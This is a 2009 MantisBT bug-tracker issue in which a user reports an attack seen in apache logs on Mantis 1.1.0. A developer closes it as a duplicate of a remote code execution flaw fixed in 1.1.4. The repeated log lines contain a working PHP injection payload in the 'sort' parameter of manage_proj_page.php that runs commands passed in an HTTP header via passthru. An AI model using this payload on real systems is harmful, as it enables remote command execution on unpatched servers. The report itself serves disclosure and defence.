View Issue Details

IDProjectCategoryView StatusLast Update
0010025mantisbtsecuritypublic2009-06-26 12:02
Reporterslashie Assigned Tojreese  
PrioritynormalSeverityminorReproducibilityN/A
Status closedResolutionduplicate 
Product Version1.1.0 
Summary0010025: Possible hacking attack
Description

Hello!

My current hosting company has reported the following as a hacking attack, as evidenced in the following apache logs. I am posting this here so maybe the development team notices it and can correct it, it happened on mantis 1.1.0

88.191.51.191 - - [07/Jan/2009:08:11:44 -0600] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 4387 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:11:45 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3968 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:11:48 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3934 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:12:00 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 4070 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:12:32 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3915 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:13:16 -0600] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 4387 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:14:17 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3827 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:15:03 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3827 "-" "-"

Hope it helps,

Gratefully,

Santiago Zapata

TagsNo tags attached.

Relationships

duplicate of 0009704 closedgiallu Remote Code Execution in manage_proj_page.php 

Activities

jreese

jreese

2009-01-07 13:55

reporter   ~0020555

This has been fixed since 1.1.4. Please upgrade to the latest release of 1.1.6.

Issue History

Date Modified Username Field Change
2009-01-07 13:08 slashie New Issue
2009-01-07 13:55 jreese Note Added: 0020555
2009-01-07 13:55 jreese Relationship added duplicate of 0009704
2009-01-07 13:55 jreese Status new => resolved
2009-01-07 13:55 jreese Resolution open => duplicate
2009-01-07 13:55 jreese Assigned To => jreese
2009-06-26 12:02 vboctor Status resolved => closed